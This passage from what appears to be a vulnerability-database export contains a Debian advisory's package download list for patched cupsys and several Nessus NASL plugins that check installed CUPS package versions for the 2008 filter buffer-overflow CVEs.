(HP PA RISC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 84800 df6569c3eaad919b7f7768a75277838f\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 91988 08040e0dcc8cc99298d40aa370be50cc\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 1624214 e5d55a0aeacee0d85d7899018725b3d3\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 153956 e11bfd3cb812f0892238a676a3453967\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 171790 5b483d2f739ed456d94cf28047b2b2f5\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 39548 181a14e58af274287bf02f8a758b70b5\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 57398 715a6f4bb1b68b8a384a85ac384de668\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_hppa.deb\n Size/MD5 checksum: 1032836 e1d9158ff6134678b976331566db0076\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 999302 2ccf6ae0ef6f3d3dd56e484ba2199313\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 160638 f22f7da23cd3dea82d49cc9900d62512\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 138276 392028f61da2c29dcab1ffe3b4fe072f\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 1548856 e1e04e47f556586eb83aff005d4870d2\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 36474 9bea3cd926f04da508b6a714f0a1daac\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 86776 f3188eafaa1bd01a7b92d9403aab03a1\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 79878 ba1ed2b707101da54b3990b33ee1d877\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_i386.deb\n Size/MD5 checksum: 53276 346cdebc7980089b28610ceb30f65519\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 106226 829b2e5f435c8fb5eee03513654ee12f\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 106998 08fcec24b8c165542d986a1fd174ddd3\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 46336 32d29b5c2986070f5d5b909864952dc3\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 1771030 e7b261b4627ee20a3083a4f18a382e24\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 192370 576e218a37e677170e9201946f24da5a\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 1108310 bdee8fbcfd10ba2847ab81ced8e9cc73\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 204232 d5eb2138a8584813643dfe4e39d2fefb\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_ia64.deb\n Size/MD5 checksum: 74224 846a87584f78285569aee9c037b677d9\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 158560 74bc73b9eb3c7494ce762f7beb9ab4cd\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 1553460 cd35f3de34290840be09b1b10729d7b3\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 150900 150e5405933cef2a8cf9147d88c9a4fb\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 57860 2b7cdd4399e2893d2df0b5568d766239\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 86996 d4776eace76cb37f72557a44d053a677\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 1085494 429194a44228d669ecfa2acdeadf55e6\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 36058 f28b3f705fd293fc82a256d571119452\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_mipsel.deb\n Size/MD5 checksum: 77448 4a9be71b3fc25253b1e77c2594e7f508\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 51880 d1b872415002b54aba1ef54833cd5564\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 90008 fe2be6aba034693532a01b653781f501\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 1576600 d954a84710f9671d34eca72922f8d1d8\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 136868 ee633edb72a9d6d74481d9fe17d887d5\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 1143388 320529a907596704df487d89978e1948\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 41296 8e0fed6ae1645411f4daa52842ead589\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 163206 d0fc59550e27b346adb422e4d82cecaf\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_powerpc.deb\n Size/MD5 checksum: 88476 dfe47fbfeef0a714d6397ec9467165af\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 1037260 a151e36916ffd7eae88e6b82cc0c08d7\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 37420 b095022e25c603ee57748795c4ec423b\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 82338 3417e5562b6aa064ab5d3d11f15a69fb\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 87928 6eea10e5b223fbd5f5a8d524bb03ab8e\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 1587330 8b66abd7e3156f3beeaa27fbd971cbde\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 166710 10f172f4c48ab9981d7c48564a2142a4\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 144932 3955c00c6293f7aec0a7cb9edb28a16d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_s390.deb\n Size/MD5 checksum: 52524 b4e639621d58f91a8ec32043534c008f\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 51826 8e3613f9041774f1dd42586782780fb5\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 159434 d2352f19b51feab43fc17b5e3f17bb2b\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 138734 8b53d144485267cb99ec8a32262446e8\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 1577758 748b77d9e54a363d46cd61548e72df7c\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 996834 0ad8037cbb3959581a0aeb29eb84a853\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 85790 16bf4ce2378a68fc9b0ce4052e463e5d\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 36062 426fe5dbac939828393d99e561abf0e3\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_sparc.deb\n Size/MD5 checksum: 78608 f469105c5d9f121c333d5e4ac315c7be\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 11, "modified": "2008-10-20T17:22:15", "published": "2008-10-20T17:22:15", "id": "DEBIAN:DSA-1656-1:150C2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00248.html", "title": "[SECURITY] [DSA 1656-1] New cupsys packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T14:43:27", "description": "Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server.\n(CVE-2008-3639 / CVE-2008-3640 / CVE-2008-3641)", "edition": 25, "published": "2008-10-07T00:00:00", "title": "SuSE 10 Security Update : CUPS (ZYPP Patch Number 5653)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-10-07T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_CUPS-5653.NASL", "href": "https://www.tenable.com/plugins/nessus/34359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34359);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"SuSE 10 Security Update : CUPS (ZYPP Patch Number 5653)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server.\n(CVE-2008-3639 / CVE-2008-3640 / CVE-2008-3641)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3641.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5653.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-client-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-devel-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-libs-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"cups-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"cups-client-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"cups-devel-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"cups-libs-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-client-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-devel-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-libs-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"cups-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"cups-client-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"cups-devel-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"cups-libs-1.1.23-40.46\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.46\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:06", "description": "Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641).", "edition": 25, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : cups (cups-232)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:cups-libs-32bit", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:cups", "p-cpe:/a:novell:opensuse:cups-libs", "p-cpe:/a:novell:opensuse:cups-client", "p-cpe:/a:novell:opensuse:cups-devel"], "id": "SUSE_11_0_CUPS-081002.NASL", "href": "https://www.tenable.com/plugins/nessus/39941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update cups-232.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39941);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"openSUSE Security Update : cups (cups-232)\");\n script_summary(english:\"Check for the cups-232 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=430543\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cups-1.3.7-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cups-client-1.3.7-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cups-devel-1.3.7-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cups-libs-1.3.7-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.3.7-25.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-libs / cups-libs-32bit\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:02", "description": "A buffer overflow flaw was discovered in the SGI image format decoding\nroutines used by the CUPS image converting filter 'imagetops'. An\nattacker could create a malicious SGI image file that could, possibly,\nexecute arbitrary code as the 'lp' user if the file was printed.\n(CVE-2008-3639)\n\nAn integer overflow flaw leading to a heap buffer overflow was\ndiscovered in the Text-to-PostScript 'texttops' filter. An attacker\ncould create a malicious text file that could, possibly, execute\narbitrary code as the 'lp' user if the file was printed.\n(CVE-2008-3640)\n\nAn insufficient buffer bounds checking flaw was discovered in the\nHP-GL/2-to-PostScript 'hpgltops' filter. An attacker could create a\nmalicious HP-GL/2 file that could, possibly, execute arbitrary code as\nthe 'lp' user if the file was printed. (CVE-2008-3641)", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : cups on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20081010_CUPS_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60483", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60483);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was discovered in the SGI image format decoding\nroutines used by the CUPS image converting filter 'imagetops'. An\nattacker could create a malicious SGI image file that could, possibly,\nexecute arbitrary code as the 'lp' user if the file was printed.\n(CVE-2008-3639)\n\nAn integer overflow flaw leading to a heap buffer overflow was\ndiscovered in the Text-to-PostScript 'texttops' filter. An attacker\ncould create a malicious text file that could, possibly, execute\narbitrary code as the 'lp' user if the file was printed.\n(CVE-2008-3640)\n\nAn insufficient buffer bounds checking flaw was discovered in the\nHP-GL/2-to-PostScript 'hpgltops' filter. An attacker could create a\nmalicious HP-GL/2 file that could, possibly, execute arbitrary code as\nthe 'lp' user if the file was printed. (CVE-2008-3641)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0810&L=scientific-linux-errata&T=0&P=1204\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f0921b1c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"cups-1.1.17-13.3.54\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"cups-devel-1.1.17-13.3.54\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"cups-libs-1.1.17-13.3.54\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"cups-1.1.22-0.rc1.9.27.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"cups-devel-1.1.22-0.rc1.9.27.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"cups-libs-1.1.22-0.rc1.9.27.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"cups-1.2.4-11.18.el5_2.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-devel-1.2.4-11.18.el5_2.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-libs-1.2.4-11.18.el5_2.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-lpd-1.2.4-11.18.el5_2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:50:10", "description": "The release note of cups 1.3.9 reports :\n\nIt contains the following fixes :\n\n- SECURITY: The HP-GL/2 filter did not range check pen numbers (STR\n#2911)\n\n- SECURITY: The SGI image file reader did not range check 16-bit run\nlengths (STR #2918)\n\n- SECURITY: The text filter did not range check cpi, lpi, or column\nvalues (STR #2919)\n\nExploitation of this vulnerability results in the execution of\narbitrary code with the privileges of the affected service.", "edition": 25, "published": "2008-10-13T00:00:00", "title": "FreeBSD : cups -- multiple vulnerabilities (ce29ce1d-971a-11dd-ab7e-001c2514716c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": 